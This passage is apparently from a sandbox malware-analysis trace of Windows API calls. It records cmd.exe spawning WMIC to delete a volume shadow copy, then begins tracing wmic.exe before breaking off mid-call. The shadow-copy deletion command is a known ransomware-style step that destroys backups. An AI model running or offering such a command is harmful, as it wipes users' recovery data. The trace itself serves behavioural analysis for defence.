_String2="RANDOM") returned -7 [0073.469] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0073.469] GetProcessHeap () returned 0x440000 [0073.469] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x5c) returned 0x45b800 [0073.469] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef3d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0073.469] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef3d0, lpFilePart=0x2ef3b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef3b0*="Desktop") returned 0x25 [0073.469] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0073.469] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef0e0 | out: lpFindFileData=0x2ef0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x45b870 [0073.469] FindClose (in: hFindFile=0x45b870 | out: hFindFile=0x45b870) returned 1 [0073.469] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef0e0 | out: lpFindFileData=0x2ef0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x45b870 [0073.470] FindClose (in: hFindFile=0x45b870 | out: hFindFile=0x45b870) returned 1 [0073.470] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0073.470] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef0e0 | out: lpFindFileData=0x2ef0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x45b870 [0073.470] FindClose (in: hFindFile=0x45b870 | out: hFindFile=0x45b870) returned 1 [0073.470] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0073.470] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0073.470] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0073.470] GetProcessHeap () returned 0x440000 [0073.470] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45ad60 | out: hHeap=0x440000) returned 1 [0073.470] GetEnvironmentStringsW () returned 0x45b870* [0073.470] GetProcessHeap () returned 0x440000 [0073.470] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xae8) returned 0x45c360 [0073.470] FreeEnvironmentStringsW (penv=0x45b870) returned 1 [0073.470] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8fc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0073.470] GetProcessHeap () returned 0x440000 [0073.471] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45b800 | out: hHeap=0x440000) returned 1 [0073.471] GetProcessHeap () returned 0x440000 [0073.471] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4016) returned 0x45ce50 [0073.471] GetProcessHeap () returned 0x440000 [0073.471] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe4) returned 0x459680 [0073.471] GetProcessHeap () returned 0x440000 [0073.471] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45ce50 | out: hHeap=0x440000) returned 1 [0073.471] GetConsoleOutputCP () returned 0x1b5 [0073.472] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8fbfe0 | out: lpCPInfo=0x4a8fbfe0) returned 1 [0073.472] GetUserDefaultLCID () returned 0x409 [0073.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a8f7b50, cchData=8 | out: lpLCData=":") returned 2 [0073.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef4e0, cchData=128 | out: lpLCData="0") returned 2 [0073.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef4e0, cchData=128 | out: lpLCData="0") returned 2 [0073.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef4e0, cchData=128 | out: lpLCData="1") returned 2 [0073.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a90a740, cchData=8 | out: lpLCData="/") returned 2 [0073.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a90a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0073.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a90a460, cchData=32 | out: lpLCData="Tue") returned 4 [0073.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a90a420, cchData=32 | out: lpLCData="Wed") returned 4 [0073.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a90a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0073.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a90a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0073.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a90a360, cchData=32 | out: lpLCData="Sat") returned 4 [0073.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a90a700, cchData=32 | out: lpLCData="Sun") returned 4 [0073.473] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a8f7b40, cchData=8 | out: lpLCData=".") returned 2 [0073.473] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a90a4e0, cchData=8 | out: lpLCData=",") returned 2 [0073.473] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0073.473] GetProcessHeap () returned 0x440000 [0073.473] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20c) returned 0x4597e0 [0073.473] GetConsoleTitleW (in: lpConsoleTitle=0x4597e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0073.474] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0073.474] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0073.474] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0073.474] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0073.474] GetProcessHeap () returned 0x440000 [0073.474] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4012) returned 0x45ce50 [0073.474] GetProcessHeap () returned 0x440000 [0073.474] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45ce50 | out: hHeap=0x440000) returned 1 [0073.477] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0073.477] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0073.477] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0073.477] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0073.477] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0073.477] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0073.477] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0073.477] GetProcessHeap () returned 0x440000 [0073.477] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb0) returned 0x459a00 [0073.477] GetProcessHeap () returned 0x440000 [0073.477] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x54) returned 0x459ac0 [0073.479] GetProcessHeap () returned 0x440000 [0073.479] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x9e) returned 0x459b20 [0073.480] GetConsoleTitleW (in: lpConsoleTitle=0x2ef3f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0073.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0073.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0073.480] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2eef80, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2eef60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2eef60*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0073.481] GetProcessHeap () returned 0x440000 [0073.481] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x218) returned 0x459bd0 [0073.481] GetProcessHeap () returned 0x440000 [0073.481] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe2) returned 0x459df0 [0073.481] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0073.481] GetProcessHeap () returned 0x440000 [0073.481] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x420) returned 0x441320 [0073.481] SetErrorMode (uMode=0x0) returned 0x8001 [0073.481] SetErrorMode (uMode=0x1) returned 0x0 [0073.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x441330, lpFilePart=0x2eec80 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x2eec80*="wbem") returned 0x18 [0073.481] SetErrorMode (uMode=0x8001) returned 0x1 [0073.481] GetProcessHeap () returned 0x440000 [0073.482] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x441320, Size=0x54) returned 0x441320 [0073.482] GetProcessHeap () returned 0x440000 [0073.482] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441320) returned 0x54 [0073.482] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0073.482] GetProcessHeap () returned 0x440000 [0073.482] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x48) returned 0x459ee0 [0073.482] GetProcessHeap () returned 0x440000 [0073.482] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x7c) returned 0x459f30 [0073.482] GetProcessHeap () returned 0x440000 [0073.482] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x459f30, Size=0x48) returned 0x459f30 [0073.482] GetProcessHeap () returned 0x440000 [0073.482] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x459f30) returned 0x48 [0073.482] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8ef360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0073.482] GetProcessHeap () returned 0x440000 [0073.482] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe8) returned 0x459f90 [0073.486] GetProcessHeap () returned 0x440000 [0073.486] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x459f90, Size=0x7e) returned 0x459f90 [0073.486] GetProcessHeap () returned 0x440000 [0073.486] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x459f90) returned 0x7e [0073.488] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0073.488] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x2ee9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee9f0) returned 0x45a020 [0073.488] GetProcessHeap () returned 0x440000 [0073.488] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x28) returned 0x4546c0 [0073.488] FindClose (in: hFindFile=0x45a020 | out: hFindFile=0x45a020) returned 1 [0073.488] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0073.488] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0073.488] GetConsoleTitleW (in: lpConsoleTitle=0x2eef40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0073.489] InitializeProcThreadAttributeList (in: lpAttributeList=0x2eecf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eecb8 | out: lpAttributeList=0x2eecf8, lpSize=0x2eecb8) returned 1 [0073.489] UpdateProcThreadAttribute (in: lpAttributeList=0x2eecf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eeca8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2eecf8, lpPreviousValue=0x0) returned 1 [0073.489] GetStartupInfoW (in: lpStartupInfo=0x2eee10 | out: lpStartupInfo=0x2eee10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0073.489] GetProcessHeap () returned 0x440000 [0073.489] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x20) returned 0x4546f0 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0073.489] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0073.490] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0073.490] GetProcessHeap () returned 0x440000 [0073.490] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4546f0 | out: hHeap=0x440000) returned 1 [0073.490] GetProcessHeap () returned 0x440000 [0073.490] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x458a30 [0073.490] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0073.491] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2eed30*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2eece0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete", lpProcessInformation=0x2eece0*(hProcess=0x54, hThread=0x50, dwProcessId=0x6c0, dwThreadId=0x664)) returned 1 [0073.502] CloseHandle (hObject=0x50) returned 1 [0073.502] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0073.502] GetProcessHeap () returned 0x440000 [0073.502] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45c360 | out: hHeap=0x440000) returned 1 [0073.502] GetEnvironmentStringsW () returned 0x45ad60* [0073.502] GetProcessHeap () returned 0x440000 [0073.502] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xae8) returned 0x45b850 [0073.502] FreeEnvironmentStringsW (penv=0x45ad60) returned 1 [0073.502] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0084.486] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2eec28 | out: lpExitCode=0x2eec28*=0x0) returned 1 [0084.486] CloseHandle (hObject=0x54) returned 1 [0084.486] _vsnwprintf (in: _Buffer=0x2eee98, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eec38 | out: _Buffer="00000000") returned 8 [0084.486] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0084.487] GetProcessHeap () returned 0x440000 [0084.487] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45b850 | out: hHeap=0x440000) returned 1 [0084.487] GetEnvironmentStringsW () returned 0x45ad60* [0084.487] GetProcessHeap () returned 0x440000 [0084.487] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb0e) returned 0x45b880 [0084.487] FreeEnvironmentStringsW (penv=0x45ad60) returned 1 [0084.487] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0084.487] GetProcessHeap () returned 0x440000 [0084.487] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45b880 | out: hHeap=0x440000) returned 1 [0084.487] GetEnvironmentStringsW () returned 0x45ad60* [0084.487] GetProcessHeap () returned 0x440000 [0084.487] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb0e) returned 0x45b880 [0084.487] FreeEnvironmentStringsW (penv=0x45ad60) returned 1 [0084.487] GetProcessHeap () returned 0x440000 [0084.487] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458a30 | out: hHeap=0x440000) returned 1 [0084.487] DeleteProcThreadAttributeList (in: lpAttributeList=0x2eecf8 | out: lpAttributeList=0x2eecf8) [0084.487] _get_osfhandle (_FileHandle=1) returned 0x7 [0084.487] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0084.487] _get_osfhandle (_FileHandle=1) returned 0x7 [0084.487] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8ee194 | out: lpMode=0x4a8ee194) returned 1 [0084.488] _get_osfhandle (_FileHandle=0) returned 0x3 [0084.488] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8ee198 | out: lpMode=0x4a8ee198) returned 1 [0084.488] SetConsoleInputExeNameW () returned 0x1 [0084.488] GetConsoleOutputCP () returned 0x1b5 [0084.488] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8fbfe0 | out: lpCPInfo=0x4a8fbfe0) returned 1 [0084.488] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0084.488] exit (_Code=0) Process: id = "9" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x31f3f000" os_pid = "0x6c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x7ec" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 109 os_tid = 0x664 [0074.053] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fed0 | out: lpSystemTimeAsFileTime=0x18fed0*(dwLowDateTime=0x355c3530, dwHighDateTime=0x1d68245)) [0074.053] GetCurrentProcessId () returned 0x6c0 [0074.053] GetCurrentThreadId () returned 0x664 [0074.053] GetTickCount () returned 0x11490ac [0074.053] QueryPerformanceCounter (in: lpPerformanceCount=0x18fed8 | out: lpPerformanceCount=0x18fed8*=19394659425) returned 1 [0074.055] GetModuleHandleW (lpModuleName=0x0) returned 0xff740000 [0074.055] __set_app_type (_Type=0x1) [0074.055] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff78ced0) returned 0x0 [0074.056] __wgetmainargs (in: _Argc=0xff7b2380, _Argv=0xff7b2390, _Env=0xff7b2388, _DoWildCard=0, _StartInfo=0xff7b239c | out: _Argc=0xff7b2380, _Argv=0xff7b2390, _Env=0xff7b2388) returned 0 [0074.057] ??0CHString@@QEAA@XZ () returned 0xff7b2ab0 [0074.058] malloc (_Size=0x30) returned 0x355a50 [0074.059] malloc (_Size=0x70) returned 0x355a90 [0074.059] malloc (_Size=0x50) returned 0x357d30 [0074.059] malloc (_Size=0x30) returned 0x357d90 [0074.059] malloc (_Size=0x48) returned 0x357dd0 [0074.059] malloc (_Size=0x30) returned 0x357e20 [0074.059] malloc (_Size=0x30) returned 0x357e60 [0074.059] ??0CHString@@QEAA@XZ () returned 0xff7b2f58 [0074.059] malloc (_Size=0x30) returned 0x357ea0 [0074.059] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0074.060] SetConsoleCtrlHandler (HandlerRoutine=0xff785724, Add=1) returned 1 [0074.060] _onexit (_Func=0xff79f378) returned 0xff79f378 [0074.060] _onexit (_Func=0xff79f490) returned 0xff79f490 [0074.060] _onexit (_Func=0xff79f4d0) returned 0xff79f4d0 [0074.060] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0074.060] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0074.064] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0074.093] CoCreateInstance (in: rclsid=0xff7473a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff747370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff7b2940 | out: ppv=0xff7b2940*=0x1e91390) returned 0x0 [0074.104] GetCurrentProcess () returned 0xffffffffffffffff [0074.104] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x18fca0 | out: TokenHandle=0x18fca0*=0xf4) returned 1 [0074.104] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fc98 | out: TokenInformation=0x0, ReturnLength=0x18fc98) returned 0 [0074.104] malloc (_Size=0x118) returned 0x3569a0 [0074.104] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x3569a0, TokenInformationLength=0x118, ReturnLength=0x18fc98 | out: TokenInformation=0x3569a0, ReturnLength=0x18fc98) returned 1 [0074.104] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x3569a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), 